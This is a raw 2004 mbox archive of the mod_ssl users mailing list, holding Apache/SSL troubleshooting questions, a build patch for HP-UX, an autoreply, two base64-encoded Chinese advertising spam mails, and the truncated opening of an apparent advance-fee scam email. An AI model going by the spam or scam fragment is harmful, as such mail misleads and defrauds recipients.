	(No client certificate requested)
	by payute.gssi.es (Postfix) with ESMTP id A231C542A2
	for ; Thu,  8 Apr 2004 12:35:09 +0200 (CEST)
Message-ID: <40752AD8.6040601@gssi.es>
Date: Thu, 08 Apr 2004 12:35:04 +0200
From: Victoriano Giralt 
Organization: G & S Sistemas de Informacion, S.L.
User-Agent: Mozilla Thunderbird 0.5 (X11/20040208)
X-Accept-Language: es, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl, mod_rewrite, apache2 problem.
References: <000801c41cb6$15a1fe20$c947a8c0@broncos>
In-Reply-To: <000801c41cb6$15a1fe20$c947a8c0@broncos>
X-Enigmail-Version: 0.83.3.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victoriano Giralt 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

simontst wrote:

 > The nasty problem is that when I redirect a request for a page (e.g.
 > index.html) that contains an  tag in the form of:
 >
 > 
 >
 > IE 6 continually complains that the page contains insecured items and
 > refuses to display the yellow padlock. However, an examination of my 
rewrite
 > logs indicates that the GET for the logos.gif is being redirected:
[snip]
 >
 > If I remove the  tag from index.html, the complaints go away,
 > index.html is accessed using https, and the padlock appears. So it would
 > appear that there is an issue with the GET for the .gif
 >
 > Thinking that browser might be getting confused by two redirects in a row
 > (the first for http://server/index.html, and the second for
 > http://server/logos.gif) I have tried to GET the logos.gif directly via
 > http://server/logos.gif. But again, even though the request is 
redirected to
 > https://server/logos.gif, the same warning message pops up and IE 
refuses to
 > display the padlock. But if I bypass mod_rewrite and GET the gif 
using the
 > URL: https://server/logos.gif, IE does not complain.
 >
 > Finally, Mozilla does not complain at all!! Jeez! My inclination is to
 > modify the s so that they all point to a relative path name 
instead
I cannot verify what I'm talking about, both because you have not
provided the URLs to test (than can be solved by local testest, but no
time at the moment)  and because I do not use any for of windoze, I'm
just wild gessing IE's reasonig. In a wild gess, IE is right (I hate to
say so :), though you are redirecting the request, the source for the
page it is presenting has unsecure elements, the parser does not know in
advance that the objects it will have to present to the user (your
images with absolute references), are really server by secure means, it
is asked to retrieve unsecured URLs (src=http:), though the page
contains mixed elements. This is another example why absolute URLs shall
be avoided when asking for contents from the same server :)

-- 
---------------------------------------------------------------------------
G & S Sistemas de Informacion, S.L.  | Teléfono:  9 02 01 44 43
Victoriano Giralt                    | Land line: +34-952-207-741
Torre de San Telmo, 8                | Mobile:    +34-670-332-720
E-29018 Malaga (Spain)               | http://www.gssi.es/
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  8 14:54:49 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 58986A8943; Thu,  8 Apr 2004 14:54:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fep4.cogeco.net (smtp.cogeco.net [216.221.81.25])
	by master.modssl.org (Postfix) with ESMTP id F3D18A8934
	for ; Thu,  8 Apr 2004 14:54:32 +0200 (CEST)
Received: from WKONE (unknown [24.36.43.2])
	by fep4.cogeco.net (Postfix) with SMTP id C19E4A80
	for ; Thu,  8 Apr 2004 08:54:26 -0400 (EDT)
Message-ID: <00a901c41d68$a1ad9b10$8d02a8c0@WKONE>
From: "Ron Dyck" 
To: 
Subject: Failure to POST data to secure URL
Date: Thu, 8 Apr 2004 08:54:03 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Dyck" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When posting form data  to a secure URL my server is dropping the user back
to the index page. I've noticed this in several applications. Some I have
written in PHP, other written in Python (TMDA-cgi). It is not nessecarily a
large amount of data, one form has only 2 fields, though when there is a
larger amount of data, the problem is more frequent. If I don't use a secure
url (https) then the forms work fine.

I've gone through all the http logs, access, error, ssl_engine etc. and find
nothing to suggest a problem. After submitting the form, the user is simply
taken back to the home page of the site.

I'm using apache 1.3.29
mod_ssl/2.8.16
OpenSSL/0.9.7c
on linux Redhat.

The above programs where compiled not packages installed with redhat.

This issue has created quite a problem and I really would appreciate any
help.

ron

==================================
Ron Dyck
Webbtech
www.webbtech.net
==================================


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  8 18:36:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E4A03A8976; Thu,  8 Apr 2004 18:36:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from postoffice.cartmanager.net (postoffice.cartmanager.net [65.37.122.10])
	by master.modssl.org (Postfix) with ESMTP id DA83EA8941
	for ; Thu,  8 Apr 2004 18:35:48 +0200 (CEST)
Received: from jason (dhcp120.cartmanager.net [207.173.85.120])
	(authenticated bits=0)
	by postoffice.cartmanager.net (8.12.8/8.12.8) with ESMTP id i38GZ49A028823
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NO)
	for ; Thu, 8 Apr 2004 10:35:06 -0600
Message-ID: <17e301c41d87$96b102f0$7855adcf@jason>
From: "Jason" 
To: 
References: <00a901c41d68$a1ad9b10$8d02a8c0@WKONE>
Subject: Re: Failure to POST data to secure URL
Date: Thu, 8 Apr 2004 10:26:48 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I seem to remember AOL users at one point in time having problems like this
when they post from one frame to another in a browser.

Don't know if that problem still occurs, but I know it used to in AOL.  It
was a pain in the ass for me to have to work around.

----- Original Message ----- 
From: "Ron Dyck" 
To: 
Sent: Thursday, April 08, 2004 6:54 AM
Subject: Failure to POST data to secure URL


> When posting form data  to a secure URL my server is dropping the user
back
> to the index page. I've noticed this in several applications. Some I have
> written in PHP, other written in Python (TMDA-cgi). It is not nessecarily
a
> large amount of data, one form has only 2 fields, though when there is a
> larger amount of data, the problem is more frequent. If I don't use a
secure
> url (https) then the forms work fine.
>
> I've gone through all the http logs, access, error, ssl_engine etc. and
find
> nothing to suggest a problem. After submitting the form, the user is
simply
> taken back to the home page of the site.
>
> I'm using apache 1.3.29
> mod_ssl/2.8.16
> OpenSSL/0.9.7c
> on linux Redhat.
>
> The above programs where compiled not packages installed with redhat.
>
> This issue has created quite a problem and I really would appreciate any
> help.
>
> ron
>
> ==================================
> Ron Dyck
> Webbtech
> www.webbtech.net
> ==================================
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From eiSMz2O3A5w@tpts1.seed.net.tw  Mon Apr 12 20:25:16 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from win2k3 (sw68-16-95.adsl.seed.net.tw [210.68.16.95])
	by master.modssl.org (Postfix) with SMTP id B7BEAA893A
	for ; Mon, 12 Apr 2004 20:24:55 +0200 (CEST)
Received: from tpts1
	by tpts5.seed.net.tw with SMTP id 9Mw8XSejKkYfRpOIv;
	Tue, 13 Apr 2004 02:25:09 +0800
Message-ID: <9QS6EfaL6yU9fV@tcts1.seed.net.tw>
From: ³Ð·N¥Í¬¡®a@master.modssl.org
To: ok@master.modssl.org
Subject:=?big5?Q?=A1i=A5=FE=A5x=B3=CC=A7C=BB=F9=A1j=A5u=ADn=B7|=A9I=A7l~=B4N=A5i=A5H=BB=B4=C3P=BDG=A4U=A8=D3!!?=
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="----=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyF"
X-Mailer: 8KOLq6H3Z1bAIdCNPolhUXRT67za
X-Priority: 3
X-MSMail-Priority: Normal
Date: Mon, 12 Apr 2004 20:24:55 +0200 (CEST)

This is a multi-part message in MIME format.

------=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyF
Content-Type: multipart/alternative;
	boundary="----=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyFAA"


------=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyFAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

PGh0bWw+Cgo8aGVhZD4KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
RnJvbnRQYWdlIDUuMCI+CjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0iRnJvbnRQYWdlLkVk
aXRvci5Eb2N1bWVudCI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0i
dGV4dC9odG1sOyBjaGFyc2V0PWJpZzUiPgo8dGl0bGU+t3O8V7r0rbYxPC90aXRsZT4KPC9oZWFk
PgoKPGJvZHk+Cgo8cCBhbGlnbj0iY2VudGVyIj4KPGEgaHJlZj0iaHR0cDovL3Nob3AzMTguaGlw
ZXJtYWxsLmhpbmV0Lm5ldC9TaG9wU3R5bGUvYW90aDEvR29vZHNEZXNjci5hc3A/Y2F0ZWdvcnlf
aWQ9ODYmcGFyZW50X2lkPTMwJnByb2RfaWQ9TEMwMjA0MDMxIj4KPGltZyBib3JkZXI9IjAiIHNy
Yz0iaHR0cDovL3Nob3AzMTguaGlwZXJtYWxsLmhpbmV0Lm5ldC9zdG9yZS9mNC+zr6e1uKmkrabm
vUeora21vNaxTb/ouXGkbLP4MDAyLmpwZyIgd2lkdGg9IjY1MCIgaGVpZ2h0PSIxMTg0Ij48L2E+
PC9wPgoKPC9ib2R5PgoKPC9odG1sPg==


------=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyFAA--
------=_NextPart_3xrad0E0BK1Vq4k4OHgS8EpyF--




From owner-modssl-users@modssl.org  Wed Apr 14 01:29:48 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 66282A8975; Wed, 14 Apr 2004 01:29:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id DCC18A8962
	for ; Wed, 14 Apr 2004 01:29:46 +0200 (CEST)
Received: (qmail 26178 invoked by uid 65534); 13 Apr 2004 23:29:40 -0000
Received: from 217-68-167-99.cable.primacom.net (EHLO michael64) (217.68.167.99)
  by mail.gmx.net (mp018) with SMTP; 14 Apr 2004 01:29:40 +0200
X-Authenticated: #216356
From: "Michael Pfannkuchen" 
To: 
Subject: PUT Request failing with sslproxy ( https -> http )
Date: Wed, 14 Apr 2004 01:29:56 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcQhb85Vh4dzpkKpTiqEvjQbjGnTogAA9Vow
In-Reply-To: <20040413155556.00509A8A55@master.modssl.org>
Message-Id: <20040413232946.DCC18A8962@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pfannkuchen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,


does anyone have an explanation for the following behaviour:

We implemented a customized Webdav Server based on
PHP-Pear::HTTP::WebDAV_Server, running with Apache HTTP Server.

-> This works well with Windows Explorer (Webfolder) and non-SSL connections
like http://iprobe.iklk.de/phprojekt-4.1/webdav.php/

-> It also works fine with most requests over SSL(proxy):
https://ssl.iklk.de/iprobe/phprojekt-4.1/webdav.php/

->> But the problem is: PUT requests over SSL will always produce an
unspecified error message "Beim Kopieren einer oder allen der ausgewaehlten
Dateien ist ein Fehler aufgetreten" (maybe translated as "Error during
copying one or more selected files").
If you look into Apache sslproxy logfile you see there is something wrong
with copying a file to the Webdav folder ... 
----
[13/Apr/2004:18:56:32 +0200] 217.68.167.99 SSLv2 DES-CBC3-MD5 "HEAD
/phprojekt-4.1/webdav.php/Hochschulpolitik/p1.pdf HTTP/1.1" 200 - "Microsoft
Data Access Internet Publishing Provider DAV"
[13/Apr/2004:18:56:44 +0200] 217.68.167.99 SSLv2 DES-CBC3-MD5 "PUT
/phprojekt-4.1/webdav.php/Hochschulpolitik/p1.pdf HTTP/1.1" 70014 660
"Microsoft Data Access Internet Publishing Provider DAV"
----
... HEAD works ok, but PUT is getting back response code '70014' ! (ups ...)


Any ideas what could happen here?



thx4all : michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 14 02:31:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BEDDAA897A; Wed, 14 Apr 2004 02:31:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 57039A8962
	for ; Wed, 14 Apr 2004 02:30:46 +0200 (CEST)
Date: Wed, 14 Apr 2004 01:20:27 +0000
From: a.moon@mdx.ac.uk
Subject: PUT Request failing with sslproxy ( https -> http )
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 14th April 2004
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team who will try to help.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From eLp4eWkLaz@mail.sysnet.net.tw  Wed Apr 14 08:36:26 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from win2k3 (swtp74-7-128.adsl.seed.net.tw [211.74.7.128])
	by master.modssl.org (Postfix) with SMTP id 8A58BA8962
	for ; Wed, 14 Apr 2004 08:36:08 +0200 (CEST)
Received: from tpts4
	by sky.seed.net.tw with SMTP id St0Fb1UvI7GBVpNGBpicw6SCLl7;
	Wed, 14 Apr 2004 14:36:21 +0800
Message-ID: 
From: ³Ð·N¥Í¬¡®a@master.modssl.org
To: ok@master.modssl.org
Subject:=?big5?Q?=A1i=A5=FE=A5x=B3=CC=A7C=BB=F9=A1j=A6=DB=A5j=A6L=AB=D7=ACy=B6=C7=A6=DC=A4=B5=AA=BA ~ =A2=AB=B7=EC=CF=C9=BDG=A8=AD=C0=F8 =AAk=A2=A8?=
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="----=_NextPart_ITDYcdDO9hPmooyJWBJmbdo"
X-Mailer: SbvdgwGVcg1QmnxXTBLAFnKDfU
X-Priority: 3
X-MSMail-Priority: Normal
Date: Wed, 14 Apr 2004 08:36:08 +0200 (CEST)

This is a multi-part message in MIME format.

------=_NextPart_ITDYcdDO9hPmooyJWBJmbdo
Content-Type: multipart/alternative;
	boundary="----=_NextPart_ITDYcdDO9hPmooyJWBJmbdoAA"


------=_NextPart_ITDYcdDO9hPmooyJWBJmbdoAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

PGh0bWw+Cgo8aGVhZD4KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
RnJvbnRQYWdlIDUuMCI+CjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0iRnJvbnRQYWdlLkVk
aXRvci5Eb2N1bWVudCI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0i
dGV4dC9odG1sOyBjaGFyc2V0PWJpZzUiPgo8dGl0bGU+t3O8V7r0rbYxPC90aXRsZT4KPC9oZWFk
PgoKPGJvZHk+Cgo8cCBhbGlnbj0iY2VudGVyIj4KPGEgaHJlZj0iaHR0cDovL3Nob3AzMTguaGlw
ZXJtYWxsLmhpbmV0Lm5ldC9TaG9wU3R5bGUvYW90aDEvR29vZHNEZXNjci5hc3A/Y2F0ZWdvcnlf
aWQ9ODYmcGFyZW50X2lkPTMwJnByb2RfaWQ9TEMwMjAzMDE1Ij4KPGltZyBib3JkZXI9IjAiIHNy
Yz0iaHR0cDovL3Nob3AzMTguaGlwZXJtYWxsLmhpbmV0Lm5ldC9zdG9yZS9mNC+kcL9Btuq4ra5h
p1W37M/JpqHASrbsvrm5caRss/gwMDIuanBnIiB3aWR0aD0iNjUwIiBoZWlnaHQ9IjEwNTMiPjwv
YT48L3A+Cgo8L2JvZHk+Cgo8L2h0bWw+


------=_NextPart_ITDYcdDO9hPmooyJWBJmbdoAA--
------=_NextPart_ITDYcdDO9hPmooyJWBJmbdo--




From owner-modssl-users@modssl.org  Wed Apr 14 13:06:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DB589A897A; Wed, 14 Apr 2004 13:06:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fep01-app.kolumbus.fi (fep01-0.kolumbus.fi [193.229.0.41])
	by master.modssl.org (Postfix) with ESMTP id 7DFA7A8962
	for ; Wed, 14 Apr 2004 13:06:40 +0200 (CEST)
Received: from [195.255.175.142] by fep01-app.kolumbus.fi with ESMTP
          id <20040414110629.PDEF4029.fep01-app.kolumbus.fi@[195.255.175.142]>
          for ; Wed, 14 Apr 2004 14:06:29 +0300
Mime-Version: 1.0 (Apple Message framework v613)
To: modssl-users@modssl.org
Message-Id: 
Content-Type: multipart/mixed; boundary=Apple-Mail-4-554374736
From: Marko Asplund 
Subject: configuring 2.8.16 fails on HP-UX 11.00
Date: Wed, 14 Apr 2004 14:06:29 +0300
X-Mailer: Apple Mail (2.613)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-4-554374736
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	format=flowed

i'm trying to build Apache 1.3.29 with mod_ssl 2.8.16 as 64-bit 
application on HP-UX 11.00 using HP C/ANSI C compiler. the build fails 
during configuration phase. here's what happens:

gtar zxf ../apache_1.3.29.tar.gz
gtar zxf ../mod_ssl-2.8.16-1.3.29.tar.gz
cd mod_ssl-2.8.16-1.3.29
CC=cc CFLAGS="+DA2.0W +DS2.0" ./configure \
   --with-apache=../apache_1.3.29 --with-ssl=/opt/openssl/kb20dr2

======== Error Output for sanity check ========
         cd ..; cc  -DHPUX11 -Aa -Ae -D_HPUX_SOURCE -DMOD_SSL=208116 
-DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED 
+DA2.0W +DS2.0 `./apaci`   -L/opt/openssl/kb20dr2/lib  -o helpers/dummy 
helpers/dummy.c   -lm -lpthread  -ldbm -lssl -lcrypto -lm
ld: Can't find library or mismatched ABI for -ldbm
Fatal error.
*** Error exit code 1

Stop.

after removing the '-ldbm' flag from CFLAGS (see attached patch) the 
compilation goes fine.

best regards,
--
		aspa

--Apple-Mail-4-554374736
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
	x-unix-mode=0644;
	name="modsslhpux64conf.patch"
Content-Disposition: attachment;
	filename=modsslhpux64conf.patch

*** src/Configure.dist	Tue Apr 13 15:44:14 2004
--- src/Configure	Tue Apr 13 15:44:34 2004
***************
*** 371,376 ****
--- 371,377 ----
  	;;
      *-hp*-hpux11.*)
  	OS='HP-UX 11'
+ 	DBM_LIB=""
  	CFLAGS="$CFLAGS -DHPUX11"
  	RANLIB="/bin/true"
  	LIBS="$LIBS -lm -lpthread"

--Apple-Mail-4-554374736--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 14 19:59:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 47215A897A; Wed, 14 Apr 2004 19:59:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from camomile.cloud9.net (camomile.cloud9.net [168.100.1.3])
	by master.modssl.org (Postfix) with ESMTP id E5F8CA8974
	for ; Wed, 14 Apr 2004 19:59:22 +0200 (CEST)
Received: from localhost.cloud9.net (localhost.cloud9.net [127.0.0.1])
	by camomile.cloud9.net (Postfix) with ESMTP id 17DEA5670
	for ; Wed, 14 Apr 2004 13:59:16 -0400 (EDT)
Received: from camomile.cloud9.net (localhost.cloud9.net [127.0.0.1])
	by localhost.cloud9.net (VaMailArmor-2.0.1.14) id 82183-37601A7A;
	Wed, 14 Apr 2004 13:59:15 -0400
Received: from staff.cloud9.net (254-66.customer.cloud9.net [168.100.254.66])
	by camomile.cloud9.net (Postfix) with ESMTP id E4BA0564D
	for ; Wed, 14 Apr 2004 13:59:15 -0400 (EDT)
Subject: Weird intermittent "Page cannot be displayed" result
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Date: Wed, 14 Apr 2004 13:59:56 -0400
Content-class: urn:content-classes:message
Message-ID: 
X-MS-Has-Attach: 
x-mimeole: Produced By Microsoft Exchange V6.5.6944.0
X-MS-TNEF-Correlator: 
Thread-Topic: Weird intermittent "Page cannot be displayed" result
Thread-Index: AcQiSkvFDQSaErZ/RHKHJUzeXyu5nw==
From: "Mark Hennessy" 
To: 
X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.14; VAE: 6.25.0.2; VDF: 6.25.0.12; host: camomile.cloud9.net)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Hennessy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Using:
Apache/1.3.29 (Unix) PHP/4.3.5 mod_ssl/2.8.16 OpenSSL/0.9.7c-p1

I get this weird problem where an attempt to submit a POST is done by IE =
6
(SP1; Q832894 and Q831167 installed) and intermittently the response =
comes
back as "The page cannot be displayed".  The actual app in use is =
horde/imp,
and the actual thing being done is sending a message or adding an =
attachment
within the Compose Message window.

When watching ssl_engine_log from Apache in debug mode and attempting to
reproduce the problem, I see the following course of events:

I load the "compose message" form
I see a few seconds later (doesn't seem to be fixed number of seconds) =
the
following recorded to the log:
[14/Apr/2004 13:12:31 67158] [trace] OpenSSL: Write: SSL negotiation =
finished
successfully
[14/Apr/2004 13:12:31 67158] [info]  Connection to child 7 closed with
standard shutdown (server 10.0.0.2:443, client 10.0.0.13)

If I make the post request JUST AFTER these entries show up in the log, =
I get
the "Page cannot be displayed" result in the web browser.  If I send the
request before those entries were to be written, or wait for the main =
browser
page to refresh (it does so every minute or two) the operation is =
completed
successfully.

--
 Mark Hennessy
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 15 10:43:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01541A897A; Thu, 15 Apr 2004 10:43:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from windu.irisnet.be (windu.irisnet.be [195.244.170.105])
	by master.modssl.org (Postfix) with ESMTP id DEB3EA8938
	for ; Thu, 15 Apr 2004 10:42:57 +0200 (CEST)
Received: from fwcirb.irisnet.be ([195.244.162.7])
	by windu.irisnet.be with esmtp (Exim 4.30)
	id 1BE2SR-0001vc-BE
	for modssl-users@modssl.org; Thu, 15 Apr 2004 10:42:51 +0200
Received: from mlamot (unknown [192.168.33.118])
	by fwcirb.irisnet.be (Postfix) with SMTP id 5262B2F8043
	for ; Thu, 15 Apr 2004 10:42:21 +0200 (CEST)
Message-ID: <006301c422c5$b3ea6080$7621a8c0@mlamot>
From: "Lamot Michael" 
To: 
Subject: Client certificate verification && Error handling in apache2 with mod_ssl
Date: Thu, 15 Apr 2004 10:43:19 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0060_01C422D6.7766FB80"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1409
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
X-SA-Exim-Mail-From: mlamot@cirb.irisnet.be
X-SA-Exim-Scanned: No; SAEximRunCond expanded to false
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lamot Michael" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0060_01C422D6.7766FB80
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello,

Does mod_ssl support any type of error handling for the client =
certificate authentification?=20
I'd really like to have another page load than a server not found one =
when a client presents an invalid certificate.

If not, is it possible to bypass some verifications such as the cert =
date, so my servlet engine can check that itself
and display an appropriated error page instead of the server not found =
one?=20
So Apache would just take the certificate, not check anything, export =
it, and I'll handle all cert related errors somewhere else.

Thanks,

Michael Lamot


------=_NextPart_000_0060_01C422D6.7766FB80
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello,


 


Does mod_ssl support any type of error =
handling for=20
the client certificate authentification? 


I'd really like to have another page =
load than a=20
server not found one when a client presents an invalid =
certificate.


 


If not, is it possible to bypass some =
verifications=20
such as the cert date, so my servlet engine can check that =
itself


and display an appropriated error page =
instead of=20
the server not found one? 


So Apache would just take the =
certificate,=20
not check anything, export it, and =
I'll handle=20
all cert related errors somewhere else.


 


Thanks,


 


Michael Lamot


 


 


------=_NextPart_000_0060_01C422D6.7766FB80--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From monicamtf11@galmail.co.za  Thu Apr 15 13:58:07 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mail02.infosat.net (mailout03.infosat.net [66.18.69.3])
	by master.modssl.org (Postfix) with ESMTP id DCEECA8933
	for ; Thu, 15 Apr 2004 13:57:39 +0200 (CEST)
Received: from [196.38.110.46] (HELO mail01.infosat.net)
  by mail02.infosat.net (CommuniGate Pro SMTP 4.1.8)
  with ESMTP id 62948568; Thu, 15 Apr 2004 13:57:01 +0200
Received: from [165.165.187.124] (account monicamtf11@galmail.co.za)
  by mail01.infosat.net (CommuniGate Pro WebUser 4.1.8)
  with HTTP id 285758567; Thu, 15 Apr 2004 13:57:01 +0200
From: "monica martins" 
Subject: FROM  MONICA
To: monicamtf11@galmail.co.za
X-Mailer: CommuniGate Pro WebUser Interface v.4.1.8
Date: Thu, 15 Apr 2004 13:57:01 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="_===285758567====mail01.infosat.net===_"

This is a multi-part MIME message

--_===285758567====mail01.infosat.net===_
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit

From: Mrs.Monica Martins 
23 Rivonia Road Sandton City
Johannesburg South Africa
Tel+27-83-238-3440

ATTN: Sir, 

